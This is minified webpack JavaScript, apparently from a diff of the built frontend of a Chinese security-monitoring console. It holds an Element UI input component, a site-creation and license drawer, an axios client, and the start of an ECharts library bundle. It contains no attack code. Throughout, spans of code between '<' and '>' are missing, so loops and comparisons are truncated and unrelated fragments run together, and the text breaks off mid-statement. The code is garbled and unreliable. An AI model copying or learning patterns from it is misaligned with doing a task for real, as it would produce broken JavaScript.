f=i(9),m=i.n(f),v=i(21),g={name:"ElInput",componentName:"ElInput",mixins:[a.a,l.a],inheritAttrs:!1,inject:{elForm:{default:""},elFormItem:{default:""}},data:function(){return{textareaCalcStyle:{},hovering:!1,focused:!1,isComposing:!1,passwordVisible:!1}},props:{value:[String,Number],size:String,resize:String,form:String,disabled:Boolean,readonly:Boolean,type:{type:String,default:"text"},autosize:{type:[Boolean,Object],default:!1},autocomplete:{type:String,default:"off"},autoComplete:{type:String,validator:function(e){return!0}},validateEvent:{type:Boolean,default:!0},suffixIcon:String,prefixIcon:String,label:String,clearable:{type:Boolean,default:!1},showPassword:{type:Boolean,default:!1},showWordLimit:{type:Boolean,default:!1},tabindex:String},computed:{_elFormItemSize:function(){return(this.elFormItem||{}).elFormItemSize},validateState:function(){return this.elFormItem?this.elFormItem.validateState:""},needStatusIcon:function(){return!!this.elForm&&this.elForm.statusIcon},validateIcon:function(){return{validating:"el-icon-loading",success:"el-icon-circle-check",error:"el-icon-circle-close"}[this.validateState]},textareaStyle:function(){return m()({},this.textareaCalcStyle,{resize:this.resize})},inputSize:function(){return this.size||this._elFormItemSize||(this.$ELEMENT||{}).size},inputDisabled:function(){return this.disabled||(this.elForm||{}).disabled},nativeInputValue:function(){return null===this.value||void 0===this.value?"":String(this.value)},showClear:function(){return this.clearable&&!this.inputDisabled&&!this.readonly&&this.nativeInputValue&&(this.focused||this.hovering)},showPwdVisible:function(){return this.showPassword&&!this.inputDisabled&&!this.readonly&&(!!this.nativeInputValue||this.focused)},isWordLimitVisible:function(){return this.showWordLimit&&this.$attrs.maxlength&&("text"===this.type||"textarea"===this.type)&&!this.inputDisabled&&!this.readonly&&!this.showPassword},upperLimit:function(){return this.$attrs.maxlength},textLength:function(){return"number"===typeof this.value?String(this.value).length:(this.value||"").length},inputExceed:function(){return this.isWordLimitVisible&&this.textLength>this.upperLimit}},watch:{value:function(e){this.$nextTick(this.resizeTextarea),this.validateEvent&&this.dispatch("ElFormItem","el.form.change",[e])},nativeInputValue:function(){this.setNativeInputValue()},type:function(){var e=this;this.$nextTick((function(){e.setNativeInputValue(),e.resizeTextarea(),e.updateIconOffset()}))}},methods:{focus:function(){this.getInput().focus()},blur:function(){this.getInput().blur()},getMigratingConfig:function(){return{props:{icon:"icon is removed, use suffix-icon / prefix-icon instead.","on-icon-click":"on-icon-click is removed."},events:{click:"click is removed."}}},handleBlur:function(e){this.focused=!1,this.$emit("blur",e),this.validateEvent&&this.dispatch("ElFormItem","el.form.blur",[this.value])},select:function(){this.getInput().select()},resizeTextarea:function(){if(!this.$isServer){var e=this.autosize,t=this.type;if("textarea"===t)if(e){var i=e.minRows,n=e.maxRows;this.textareaCalcStyle=p(this.$refs.textarea,i,n)}else this.textareaCalcStyle={minHeight:p(this.$refs.textarea).minHeight}}},setNativeInputValue:function(){var e=this.getInput();e&&e.value!==this.nativeInputValue&&(e.value=this.nativeInputValue)},handleFocus:function(e){this.focused=!0,this.$emit("focus",e)},handleCompositionStart:function(e){this.$emit("compositionstart",e),this.isComposing=!0},handleCompositionUpdate:function(e){this.$emit("compositionupdate",e);var t=e.target.value,i=t[t.length-1]||"";this.isComposing=!Object(v["isKorean"])(i)},handleCompositionEnd:function(e){this.$emit("compositionend",e),this.isComposing&&(this.isComposing=!1,this.handleInput(e))},handleInput:function(e){this.isComposing||e.target.value!==this.nativeInputValue&&(this.$emit("input",e.target.value),this.$nextTick(this.setNativeInputValue))},handleChange:function(e){this.$emit("change",e.target.value)},calcIconOffset:function(e){var t=[].slice.call(this.$el.querySelectorAll(".el-input__"+e)||[]);if(t.length){for(var i=null,n=0;n0,expression:"total > 0"}],staticStyle:{"margin-left":"-20px","margin-top":"-10px"},attrs:{total:e.total,page:e.listQuery.page,limit:e.listQuery.limit},on:{"update:page":function(t){return e.$set(e.listQuery,"page",t)},"update:limit":function(t){return e.$set(e.listQuery,"limit",t)},pagination:e.getSiteList}})],1),i("el-drawer",{attrs:{title:"创建站点",visible:e.siteCreatPop,direction:e.direction,wrapperClosable:!1,size:"35%"},on:{"update:visible":function(t){e.siteCreatPop=t}}},[i("div",{staticClass:"demo-drawer__content"},[i("el-form",{ref:"form",attrs:{model:e.siteAll,"label-width":"20%"}},[i("el-form-item",{attrs:{label:"站点名称:"}},[i("el-col",{attrs:{span:10}},[i("el-input",{attrs:{size:"small"},model:{value:e.siteAll.websiteName,callback:function(t){e.$set(e.siteAll,"websiteName",t)},expression:"siteAll.websiteName"}})],1)],1),i("el-form-item",{attrs:{label:"站点域名:"}},[i("el-col",{attrs:{span:15}},[i("el-input",{attrs:{size:"small"},model:{value:e.siteAll.websiteDomain,callback:function(t){e.$set(e.siteAll,"websiteDomain",t)},expression:"siteAll.websiteDomain"}})],1)],1),i("el-form-item",{attrs:{label:"站点备注:"}},[i("el-col",{attrs:{span:15}},[i("el-input",{attrs:{type:"textarea",size:"small"},model:{value:e.siteAll.websiteRemark,callback:function(t){e.$set(e.siteAll,"websiteRemark",t)},expression:"siteAll.websiteRemark"}})],1)],1),i("el-form-item",{attrs:{label:"开启服务:",prop:"desc"}},[i("el-checkbox-group",{staticClass:"checkone",on:{change:e.CheckedOneChange_active},model:{value:e.activeCheckedOne,callback:function(t){e.activeCheckedOne=t},expression:"activeCheckedOne"}},e._l(e.activeList,(function(t){return i("el-checkbox",{key:t.id,attrs:{label:t.id}},[e._v(e._s(t.name))])})),1)],1),i("el-form-item",{attrs:{label:"ES的地址:"}},[i("el-col",{attrs:{span:15}},[i("el-input",{attrs:{size:"small"},model:{value:e.siteAll.websiteEsIp,callback:function(t){e.$set(e.siteAll,"websiteEsIp",t)},expression:"siteAll.websiteEsIp"}})],1)],1),i("el-form-item",{attrs:{label:"ES的端口:"}},[i("el-col",{attrs:{span:15}},[i("el-input",{attrs:{size:"small"},model:{value:e.siteAll.websiteEsPort,callback:function(t){e.$set(e.siteAll,"websiteEsPort",t)},expression:"siteAll.websiteEsPort"}})],1)],1),i("el-form-item",{attrs:{label:"ES访问协议:"}},[i("el-col",{attrs:{span:15}},[i("el-select",{attrs:{size:"small"},model:{value:e.siteAll.websiteProto,callback:function(t){e.$set(e.siteAll,"websiteProto",t)},expression:"siteAll.websiteProto"}},[i("el-option",{attrs:{label:"HTTP",value:"0"}}),i("el-option",{attrs:{label:"HTTPS",value:"1"}})],1)],1)],1),e.activeCheckedOne.indexOf(3)>-1?i("el-form-item",{attrs:{label:"站点日志索引:"}},[i("el-col",{attrs:{span:15}},[i("el-input",{attrs:{size:"small"},model:{value:e.siteAll.websiteWebLogIndex,callback:function(t){e.$set(e.siteAll,"websiteWebLogIndex",t)},expression:"siteAll.websiteWebLogIndex"}})],1)],1):e._e(),e.activeCheckedOne.indexOf(1)>-1?i("el-form-item",{attrs:{label:"IDS日志索引:"}},[i("el-col",{attrs:{span:15}},[i("el-input",{attrs:{size:"small"},model:{value:e.siteAll.websiteFlowIndex,callback:function(t){e.$set(e.siteAll,"websiteFlowIndex",t)},expression:"siteAll.websiteFlowIndex"}})],1)],1):e._e()],1),i("div",{staticClass:"demo-drawer__footer"},[i("el-button",{on:{click:function(t){return e.returnBtn()}}},[e._v("取 消")]),i("el-button",{attrs:{type:"primary"},on:{click:function(t){return e.siteBtn()}}},[e._v("创建站点")])],1)],1)]),i("el-drawer",{attrs:{title:"License管理",visible:e.licenseStatus,direction:e.direction,size:e.newAlterSize},on:{"update:visible":function(t){e.licenseStatus=t}}},[i("div",{staticClass:"demo-drawer__content"},[i("el-form",{ref:"form",staticStyle:{"margin-left":"-13px","margin-bottom":"-10px"},attrs:{model:e.LicenseModel,"label-width":"100px",inline:!0}},[i("el-descriptions",{staticClass:"margin-top",staticStyle:{"margin-left":"38px","margin-right":"30px","margin-bottom":"20px"},attrs:{column:1,border:""}},[i("el-descriptions-item",{attrs:{labelStyle:"width: 100px"}},[i("template",{attrs:{contentStyle:"width:400px"},slot:"label"},[e._v(" 当前版本 ")]),e._v(" "+e._s(e.LicenseModel.Version)+" ")],2),i("el-descriptions-item",[i("template",{slot:"label"},[e._v(" License信息 ")]),""!=e.LicenseModel.Info?i("span",[e._v(e._s(e.LicenseModel.Info))]):i("span",[e._v("未有License")])],2)],1)],1),i("div",{staticClass:"demo-drawer__footer"},[i("el-button",{attrs:{size:"small"},on:{click:e.LicenseReturn}},[e._v(" 返回")]),i("el-button",{attrs:{size:"small",type:"primary"},on:{click:e.LicenseReturn}},[e._v(" 更新License")])],1)],1)])],2)])])},a=[],n=i("ade3"),l=(i("d3b7"),i("159b"),i("a15b"),i("a18c"),i("333d")),o=i("b775"),r=i("4328"),c=i.n(r);function u(e){return o["a"].post("/license/info",c.a.stringify(e))}function d(e){return o["a"].post("/website/lists",c.a.stringify(e))}function p(e){return o["a"].post("/website/create",c.a.stringify(e))}var m=[{id:1,name:"流量监控"},{id:2,name:"漏洞扫描"},{id:3,name:"Web日志监控"}],b={name:"",components:{Pagination:l["a"]},props:{},data:function(){return{LicenseModel:{},activeName:"first",currentIndex:"0",siteCreatPop:!1,direction:"rtl",licenseStatus:!1,newAlterSize:"25%",siteAll:{websiteName:"",websiteDomain:"",websiteRemark:"",websiteServices:[],websiteWebLogIndex:"",websiteEsIp:"",websiteEsPort:"",websiteProto:"",websiteFlowIndex:""},activeList:m,isIndeterminate_active:!0,activeCheckedOne:[],activeCheckAll:!1,active_second:"",flag_active:"",listLoading:!1,Records:[],total:0,listQuery:{page:1,limit:10}}},watch:{},created:function(){this.getSiteList()},mounted:function(){},methods:Object(n["a"])({ControllerManage:function(){localStorage.setItem("websiteName","元豚控制台"),localStorage.setItem("roles","console"),this.$router.push({path:"/users"})},Readme:function(){window.open("http://w3asoc.aidolphins.com","_blank")},LicenseReturn:function(){this.licenseStatus=!1},LicenseManage:function(){var e=this;u().then((function(t){if(1===t.status){for(var i=0;i0&&t2)if(c=h(c),t=c.charCodeAt(0),43===t||45===t){if(i=c.charCodeAt(2),88===i||120===i)return NaN}else if(48===t){switch(c.charCodeAt(1)){case 66:case 98:s=2,a=49;break;case 79:case 111:s=8,a=55;break;default:return+c}for(n=c.slice(2),l=n.length,o=0;oa)return NaN;return parseInt(n,s)}return+c};if(n(g,!v(" 0o1")||!v("0b1")||v("+0x1"))){for(var k,A=function(e){var t=arguments.length<1?0:e,i=this;return i instanceof A&&(C?d((function(){w.valueOf.call(i)})):r(i)!=g)?c(new v(_(t)),i,A):_(t)},I=s?m(v):"MAX_VALUE,MIN_VALUE,NaN,NEGATIVE_INFINITY,POSITIVE_INFINITY,EPSILON,isFinite,isInteger,isNaN,isSafeInteger,MAX_SAFE_INTEGER,MIN_SAFE_INTEGER,parseFloat,parseInt,isInteger".split(","),S=0;I.length>S;S++)o(v,k=I[S])&&!o(A,k)&&f(A,k,b(v,k));A.prototype=w,w.constructor=A,l(a,g,A)}},b775:function(e,t,i){"use strict";i("d3b7");var s=i("bc3a"),a=i.n(s),n=i("5c96"),l=a.a.create({baseURL:"/prod-api",timeout:5e3});l.interceptors.request.use((function(e){return e.headers["token"]=localStorage.getItem("token"),e.headers["website"]=localStorage.getItem("websiteDomain"),e.headers["roles"]=localStorage.getItem("roles"),e}),(function(e){return Promise.reject(e)})),l.interceptors.response.use((function(e){var t=e.data;return t}),(function(e){return Object(n["Notification"])({message:e.message,title:"错误",type:"error"}),Promise.reject(e)})),t["a"]=l},f1df:function(e,t,i){"use strict";i("8312")}}]); \ No newline at end of file diff --git a/frontend/dist/static/js/chunk-libs.ad840119.js b/frontend/dist/static/js/chunk-libs.ad840119.js new file mode 100644 index 0000000..7547b53 --- /dev/null +++ b/frontend/dist/static/js/chunk-libs.ad840119.js @@ -0,0 +1,68 @@ +(window["webpackJsonp"]=window["webpackJsonp"]||[]).push([["chunk-libs"],{"0046":function(e,t,n){var i=n("6d8b"),r=i.each,o=i.createHashMap,a=n("4f85"),s=n("3301"),l=a.extend({type:"series.parallel",dependencies:["parallel"],visualColorAccessPath:"lineStyle.color",getInitialData:function(e,t){var n=this.getSource();return u(n,this),s(n,this)},getRawIndicesByActiveState:function(e){var t=this.coordinateSystem,n=this.getData(),i=[];return t.eachActiveState(n,(function(t,r){e===t&&i.push(n.getRawIndex(r))})),i},defaultOption:{zlevel:0,z:2,coordinateSystem:"parallel",parallelIndex:0,label:{show:!1},inactiveOpacity:.05,activeOpacity:1,lineStyle:{width:1,opacity:.45,type:"solid"},emphasis:{label:{show:!1}},progressive:500,smooth:!1,animationEasing:"linear"}});function u(e,t){if(!e.encodeDefine){var n=t.ecModel.getComponent("parallel",t.get("parallelIndex"));if(n){var i=e.encodeDefine=o();r(n.dimensions,(function(e){var t=c(e);i.set(e,t)}))}}}function c(e){return+e.replace("dim","")}e.exports=l},"004f":function(e,t,n){var i=n("6d8b"),r=n("72b6"),o=n("2306"),a=n("a15a"),s=a.createSymbol,l=n("f934"),u=n("cbb0"),c=r.extend({type:"visualMap.piecewise",doRender:function(){var e=this.group;e.removeAll();var t=this.visualMapModel,n=t.get("textGap"),r=t.textStyleModel,a=r.getFont(),s=r.getTextColor(),u=this._getItemAlign(),c=t.itemSize,h=this._getViewData(),d=h.endsText,f=i.retrieve(t.get("showLabel",!0),!d);function p(r){var l=r.piece,h=new o.Group;h.onclick=i.bind(this._onItemClick,this,l),this._enableHoverLink(h,r.indexInModelPieceList);var d=t.getRepresentValue(l);if(this._createItemSymbol(h,d,[0,0,c[0],c[1]]),f){var p=this.visualMapModel.getValueState(d);h.add(new o.Text({style:{x:"right"===u?-n:c[0]+n,y:c[1]/2,text:l.text,textVerticalAlign:"middle",textAlign:u,textFont:a,textFill:s,opacity:"outOfRange"===p?.5:1}}))}e.add(h)}d&&this._renderEndsText(e,d[0],c,f,u),i.each(h.viewPieceList,p,this),d&&this._renderEndsText(e,d[1],c,f,u),l.box(t.get("orient"),e,t.get("itemGap")),this.renderBackground(e),this.positionGroup(e)},_enableHoverLink:function(e,t){function n(e){var n=this.visualMapModel;n.option.hoverLink&&this.api.dispatchAction({type:e,batch:u.makeHighDownBatch(n.findTargetDataIndices(t),n)})}e.on("mouseover",i.bind(n,this,"highlight")).on("mouseout",i.bind(n,this,"downplay"))},_getItemAlign:function(){var e=this.visualMapModel,t=e.option;if("vertical"===t.orient)return u.getItemAlign(e,this.api,e.itemSize);var n=t.align;return n&&"auto"!==n||(n="left"),n},_renderEndsText:function(e,t,n,i,r){if(t){var a=new o.Group,s=this.visualMapModel.textStyleModel;a.add(new o.Text({style:{x:i?"right"===r?n[0]:0:n[0]/2,y:n[1]/2,textVerticalAlign:"middle",textAlign:i?r:"center",text:t,textFont:s.getFont(),textFill:s.getTextColor()}})),e.add(a)}},_getViewData:function(){var e=this.visualMapModel,t=i.map(e.getPieceList(),(function(e,t){return{piece:e,indexInModelPieceList:t}})),n=e.get("text"),r=e.get("orient"),o=e.get("inverse");return("horizontal"===r?o:!o)?t.reverse():n&&(n=n.slice().reverse()),{viewPieceList:t,endsText:n}},_createItemSymbol:function(e,t,n){e.add(s(this.getControllerVisual(t,"symbol"),n[0],n[1],n[2],n[3],this.getControllerVisual(t,"color")))},_onItemClick:function(e){var t=this.visualMapModel,n=t.option,r=i.clone(n.selected),o=t.getSelectedMapKey(e);"single"===n.selectedMode?(r[o]=!0,i.each(r,(function(e,t){r[t]=t===o}))):r[o]=!r[o],this.api.dispatchAction({type:"selectDataRange",from:this.uid,visualMapId:this.visualMapModel.id,selected:r})}}),h=c;e.exports=h},"007d":function(e,t,n){var i=n("3eba");n("cb8f"),n("a96b"),n("42f6"),i.registerAction({type:"showTip",event:"showTip",update:"tooltip:manuallyShowTip"},(function(){})),i.registerAction({type:"hideTip",event:"hideTip",update:"tooltip:manuallyHideTip"},(function(){}))},"00b4":function(e,t,n){"use strict";n("ac1f");var i=n("23e7"),r=n("861d"),o=function(){var e=!1,t=/[ac]/;return t.exec=function(){return e=!0,/./.exec.apply(this,arguments)},!0===t.test("abc")&&e}(),a=/./.test;i({target:"RegExp",proto:!0,forced:!o},{test:function(e){if("function"!==typeof this.exec)return a.call(this,e);var t=this.exec(e);if(null!==t&&!r(t))throw new Error("RegExp exec method returned something other than an Object or null");return!!t}})},"00ba":function(e,t,n){var i=n("3eba"),r=n("6d8b"),o=n("e46b"),a=n("e0d3"),s=a.defaultEmphasis,l=n("0f99"),u=l.makeSeriesEncodeForNameBased,c=n("c4a3"),h=i.extendSeriesModel({type:"series.funnel",init:function(e){h.superApply(this,"init",arguments),this.legendVisualProvider=new c(r.bind(this.getData,this),r.bind(this.getRawData,this)),this._defaultLabelLine(e)},getInitialData:function(e,t){return o(this,{coordDimensions:["value"],encodeDefaulter:r.curry(u,this)})},_defaultLabelLine:function(e){s(e,"labelLine",["show"]);var t=e.labelLine,n=e.emphasis.labelLine;t.show=t.show&&e.label.show,n.show=n.show&&e.emphasis.label.show},getDataParams:function(e){var t=this.getData(),n=h.superCall(this,"getDataParams",e),i=t.mapDimension("value"),r=t.getSum(i);return n.percent=r?+(t.get(i,e)/r*100).toFixed(2):0,n.$vars.push("percent"),n},defaultOption:{zlevel:0,z:2,legendHoverLink:!0,left:80,top:60,right:80,bottom:60,minSize:"0%",maxSize:"100%",sort:"descending",orient:"vertical",gap:0,funnelAlign:"center",label:{show:!0,position:"outer"},labelLine:{show:!0,length:20,lineStyle:{width:1,type:"solid"}},itemStyle:{borderColor:"#fff",borderWidth:1},emphasis:{label:{show:!0}}}}),d=h;e.exports=d},"00d8":function(e,t,n){var i=n("6d8b");function r(e,t){return t=t||[0,0],i.map([0,1],(function(n){var i=t[n],r=e[n]/2,o=[],a=[];return o[n]=i-r,a[n]=i+r,o[1-n]=a[1-n]=t[1-n],Math.abs(this.dataToPoint(o)[n]-this.dataToPoint(a)[n])}),this)}function o(e){var t=e.getBoundingRect();return{coordSys:{type:"geo",x:t.x,y:t.y,width:t.width,height:t.height,zoom:e.getZoom()},api:{coord:function(t){return e.dataToPoint(t)},size:i.bind(r,e)}}}e.exports=o},"00ee":function(e,t,n){var i=n("b622"),r=i("toStringTag"),o={};o[r]="z",e.exports="[object z]"===String(o)},"0141":function(e,t,n){var i=n("6d8b"),r=n("9850"),o=n("6cc5"),a=n("5b87");function s(e,t,n,i){o.call(this,e),this.map=t;var r=a.load(t,n);this._nameCoordMap=r.nameCoordMap,this._regionsMap=r.regionsMap,this._invertLongitute=null==i||i,this.regions=r.regions,this._rect=r.boundingRect}function l(e,t,n,i){var r=n.geoModel,o=n.seriesModel,a=r?r.coordinateSystem:o?o.coordinateSystem||(o.getReferringComponents("geo")[0]||{}).coordinateSystem:null;return a===this?a[e](i):null}s.prototype={constructor:s,type:"geo",dimensions:["lng","lat"],containCoord:function(e){for(var t=this.regions,n=0;nl)i(s,n=t[l++])&&(~o(u,n)||u.push(n));return u}},"04f6":function(e,t){var n=32,i=7;function r(e){var t=0;while(e>=n)t|=1&e,e>>=1;return e+t}function o(e,t,n,i){var r=t+1;if(r===n)return 1;if(i(e[r++],e[t])<0){while(r=0)r++;return r-t}function a(e,t,n){n--;while(t>>1,r(a,e[o])<0?l=o:s=o+1;var u=i-s;switch(u){case 3:e[s+3]=e[s+2];case 2:e[s+2]=e[s+1];case 1:e[s+1]=e[s];break;default:while(u>0)e[s+u]=e[s+u-1],u--}e[s]=a}}function l(e,t,n,i,r,o){var a=0,s=0,l=1;if(o(e,t[n+r])>0){s=i-r;while(l0)a=l,l=1+(l<<1),l<=0&&(l=s);l>s&&(l=s),a+=r,l+=r}else{s=r+1;while(ls&&(l=s);var u=a;a=r-l,l=r-u}a++;while(a>>1);o(e,t[n+c])>0?a=c+1:l=c}return l}function u(e,t,n,i,r,o){var a=0,s=0,l=1;if(o(e,t[n+r])<0){s=r+1;while(ls&&(l=s);var u=a;a=r-l,l=r-u}else{s=i-r;while(l=0)a=l,l=1+(l<<1),l<=0&&(l=s);l>s&&(l=s),a+=r,l+=r}a++;while(a>>1);o(e,t[n+c])<0?l=c:a=c+1}return l}function c(e,t){var n,r,o=i,a=0,s=0;a=e.length;var c=[];function h(e,t){n[s]=e,r[s]=t,s+=1}function d(){while(s>1){var e=s-2;if(e>=1&&r[e-1]<=r[e]+r[e+1]||e>=2&&r[e-2]<=r[e]+r[e-1])r[e-1]r[e+1])break;p(e)}}function f(){while(s>1){var e=s-2;e>0&&r[e-1]=i||m>=i);if(v)break;y<0&&(y=0),y+=2}if(o=y,o<1&&(o=1),1===r){for(h=0;h=0;h--)e[m+h]=e[g+h];if(0===r){b=!0;break}}if(e[p--]=c[f--],1===--s){b=!0;break}if(_=s-l(e[d],c,0,s,s-1,t),0!==_){for(p-=_,f-=_,s-=_,m=p+1,g=f+1,h=0;h<_;h++)e[m+h]=c[g+h];if(s<=1){b=!0;break}}if(e[p--]=e[d--],0===--r){b=!0;break}v--}while(y>=i||_>=i);if(b)break;v<0&&(v=0),v+=2}if(o=v,o<1&&(o=1),1===s){for(p-=r,d-=r,m=p+1,g=d+1,h=r-1;h>=0;h--)e[m+h]=e[g+h];e[p]=c[f]}else{if(0===s)throw new Error;for(g=p-(s-1),h=0;h=0;h--)e[m+h]=e[g+h];e[p]=c[f]}else for(g=p-(s-1),h=0;hd&&(f=d),s(e,i,i+f,i+u,t),u=f}h.pushRun(i,u),h.mergeRuns(),l-=u,i+=u}while(0!==l);h.forceMergeRuns()}}e.exports=h},"051b":function(e,t,n){var i=n("1a14"),r=n("10db");e.exports=n("0bad")?function(e,t,n){return i.f(e,t,r(1,n))}:function(e,t,n){return e[t]=n,e}},"057f":function(e,t,n){var i=n("fc6a"),r=n("241c").f,o={}.toString,a="object"==typeof window&&window&&Object.getOwnPropertyNames?Object.getOwnPropertyNames(window):[],s=function(e){try{return r(e)}catch(t){return a.slice()}};e.exports.f=function(e){return a&&"[object Window]"==o.call(e)?s(e):r(i(e))}},"05f5":function(e,t,n){var i=n("7a41"),r=n("ef08").document,o=i(r)&&i(r.createElement);e.exports=function(e){return o?r.createElement(e):{}}},"0655":function(e,t,n){var i=n("8728"),r=1e-8;function o(e,t){return Math.abs(e-t).5?t:e}function d(e,t,n,i,r){var o=e.length;if(1===r)for(var a=0;ar;if(o)e.length=r;else for(var a=i;a=0;n--)if(T[n]<=t)break;n=Math.min(n,x-2)}else{for(n=H;nt)break;n=Math.min(n-1,x-2)}H=n,q=t;var i=T[n+1]-T[n];if(0!==i)if(z=(t-T[n])/i,b)if(V=I[n],F=I[0===n?n:n-1],B=I[n>x-2?x-1:n+1],j=I[n>x-3?x-1:n+2],S)g(F,V,B,j,z,z*z,z*z*z,u(e,s),C);else{if(M)r=g(F,V,B,j,z,z*z,z*z*z,G,1),r=y(G);else{if(A)return h(V,B,z);r=m(F,V,B,j,z,z*z,z*z*z)}v(e,s,r)}else if(S)d(I[n],I[n+1],z,u(e,s),C);else{var r;if(M)d(I[n],I[n+1],z,G,1),r=y(G);else{if(A)return h(I[n],I[n+1],z);r=c(I[n],I[n+1],z)}v(e,s,r)}},$=new i({target:e._target,life:w,loop:e._loop,delay:e._delay,onframe:W,ondestroy:n});return t&&"spline"!==t&&($.easing=t),$}}}var x=function(e,t,n,i){this._tracks={},this._target=e,this._loop=t||!1,this._getter=n||l,this._setter=i||u,this._clipCount=0,this._delay=0,this._doneList=[],this._onframeList=[],this._clipList=[]};x.prototype={when:function(e,t){var n=this._tracks;for(var i in t)if(t.hasOwnProperty(i)){if(!n[i]){n[i]=[];var r=this._getter(this._target,i);if(null==r)continue;0!==e&&n[i].push({time:0,value:v(r)})}n[i].push({time:e,value:t[i]})}return this},during:function(e){return this._onframeList.push(e),this},pause:function(){for(var e=0;et&&(t=i.height)}this.height=t+1},getNodeById:function(e){if(this.getId()===e)return this;for(var t=0,n=this.children,i=n.length;t=0&&this.hostTree.data.setItemLayout(this.dataIndex,e,t)},getLayout:function(){return this.hostTree.data.getItemLayout(this.dataIndex)},getModel:function(e){if(!(this.dataIndex<0)){var t=this.hostTree,n=t.data.getItemModel(this.dataIndex);return n.getModel(e)}},setVisual:function(e,t){this.dataIndex>=0&&this.hostTree.data.setItemVisual(this.dataIndex,e,t)},getVisual:function(e,t){return this.hostTree.data.getItemVisual(this.dataIndex,e,t)},getRawIndex:function(){return this.hostTree.data.getRawIndex(this.dataIndex)},getId:function(){return this.hostTree.data.getId(this.dataIndex)},isAncestorOf:function(e){var t=e.parentNode;while(t){if(t===this)return!0;t=t.parentNode}return!1},isDescendantOf:function(e){return e!==this&&e.isAncestorOf(this)}},l.prototype={constructor:l,type:"tree",eachNode:function(e,t,n){this.root.eachNode(e,t,n)},getNodeByDataIndex:function(e){var t=this.data.getRawIndex(e);return this._nodes[t]},getNodeByName:function(e){return this.root.getNodeByName(e)},update:function(){for(var e=this.data,t=this._nodes,n=0,i=t.length;n0?"pieces":this.option.categories?"categories":"splitNumber"},setSelected:function(e){this.option.selected=r.clone(e)},getValueState:function(e){var t=a.findPieceIndex(e,this._pieceList);return null!=t&&this.option.selected[this.getSelectedMapKey(this._pieceList[t])]?"inRange":"outOfRange"},findTargetDataIndices:function(e){var t=[];return this.eachTargetSeries((function(n){var i=[],r=n.getData();r.each(this.getDataDimension(r),(function(t,n){var r=a.findPieceIndex(t,this._pieceList);r===e&&i.push(n)}),this),t.push({seriesId:n.id,dataIndex:i})}),this),t},getRepresentValue:function(e){var t;if(this.isCategory())t=e.value;else if(null!=e.value)t=e.value;else{var n=e.interval||[];t=n[0]===-1/0&&n[1]===1/0?0:(n[0]+n[1])/2}return t},getVisualMeta:function(e){if(!this.isCategory()){var t=[],n=[],i=this,o=this._pieceList.slice();if(o.length){var a=o[0].interval[0];a!==-1/0&&o.unshift({interval:[-1/0,a]}),a=o[o.length-1].interval[1],a!==1/0&&o.push({interval:[a,1/0]})}else o.push({interval:[-1/0,1/0]});var s=-1/0;return r.each(o,(function(e){var t=e.interval;t&&(t[0]>s&&l([s,t[0]],"outOfRange"),l(t.slice()),s=t[1])}),this),{stops:t,outerColors:n}}function l(r,o){var a=i.getRepresentValue({interval:r});o||(o=i.getValueState(a));var s=e(a,o);r[0]===-1/0?n[0]=s:r[1]===1/0?n[1]=s:t.push({value:r[0],color:s},{value:r[1],color:s})}}}),h={splitNumber:function(){var e=this.option,t=this._pieceList,n=Math.min(e.precision,20),i=this.getExtent(),o=e.splitNumber;o=Math.max(parseInt(o,10),1),e.splitNumber=o;var a=(i[1]-i[0])/o;while(+a.toFixed(n)!==a&&n<5)n++;e.precision=n,a=+a.toFixed(n),e.minOpen&&t.push({interval:[-1/0,i[0]],close:[0,0]});for(var s=0,l=i[0];s","≥"][t[0]]];e.text=e.text||this.formatValueText(null!=e.value?e.value:e.interval,!1,n)}),this)}};function d(e,t){var n=e.inverse;("vertical"===e.orient?!n:n)&&t.reverse()}var f=c;e.exports=f},"072d":function(e,t,n){"use strict";var i=n("0bad"),r=n("9876"),o=n("fed5"),a=n("1917"),s=n("0983"),l=n("9fbb"),u=Object.assign;e.exports=!u||n("4b8b")((function(){var e={},t={},n=Symbol(),i="abcdefghijklmnopqrst";return e[n]=7,i.split("").forEach((function(e){t[e]=e})),7!=u({},e)[n]||Object.keys(u({},t)).join("")!=i}))?function(e,t){var n=s(e),u=arguments.length,c=1,h=o.f,d=a.f;while(u>c){var f,p=l(arguments[c++]),g=h?r(p).concat(h(p)):r(p),m=g.length,v=0;while(m>v)f=g[v++],i&&!d.call(p,f)||(n[f]=p[f])}return n}:u},"07d7":function(e,t,n){var i=n("6d8b"),r=n("41ef"),o=n("607d"),a=n("65ed"),s=n("22d1"),l=n("eda2"),u=i.each,c=l.toCamelCase,h=["","-webkit-","-moz-","-o-"],d="position:absolute;display:block;border-style:solid;white-space:nowrap;z-index:9999999;";function f(e){var t="cubic-bezier(0.23, 1, 0.32, 1)",n="left "+e+"s "+t+",top "+e+"s "+t;return i.map(h,(function(e){return e+"transition:"+n})).join(";")}function p(e){var t=[],n=e.get("fontSize"),i=e.getTextColor();i&&t.push("color:"+i),t.push("font:"+e.getFont());var r=e.get("lineHeight");null==r&&(r=Math.round(3*n/2)),n&&t.push("line-height:"+r+"px");var o=e.get("textShadowColor"),a=e.get("textShadowBlur")||0,s=e.get("textShadowOffsetX")||0,l=e.get("textShadowOffsetY")||0;return a&&t.push("text-shadow:"+s+"px "+l+"px "+a+"px "+o),u(["decoration","align"],(function(n){var i=e.get(n);i&&t.push("text-"+n+":"+i)})),t.join(";")}function g(e){var t=[],n=e.get("transitionDuration"),i=e.get("backgroundColor"),o=e.getModel("textStyle"),a=e.get("padding");return n&&t.push(f(n)),i&&(s.canvasSupported?t.push("background-Color:"+i):(t.push("background-Color:#"+r.toHex(i)),t.push("filter:alpha(opacity=70)"))),u(["width","color","radius"],(function(n){var i="border-"+n,r=c(i),o=e.get(r);null!=o&&t.push(i+":"+o+("color"===n?"":"px"))})),t.push(p(o)),null!=a&&t.push("padding:"+l.normalizeCssArray(a).join("px ")+"px"),t.join(";")+";"}function m(e,t,n,i,r){var o=t&&t.painter;if(n){var s=o&&o.getViewportRoot();s&&a.transformLocalCoord(e,s,document.body,i,r)}else{e[0]=i,e[1]=r;var l=o&&o.getViewportRootOffset();l&&(e[0]+=l.offsetLeft,e[1]+=l.offsetTop)}e[2]=e[0]/t.getWidth(),e[3]=e[1]/t.getHeight()}function v(e,t,n){if(s.wxa)return null;var i=document.createElement("div");i.domBelongToZr=!0,this.el=i;var r=this._zr=t.getZr(),a=this._appendToBody=n&&n.appendToBody;this._styleCoord=[0,0,0,0],m(this._styleCoord,r,a,t.getWidth()/2,t.getHeight()/2),a?document.body.appendChild(i):e.appendChild(i),this._container=e,this._show=!1,this._hideTimeout;var 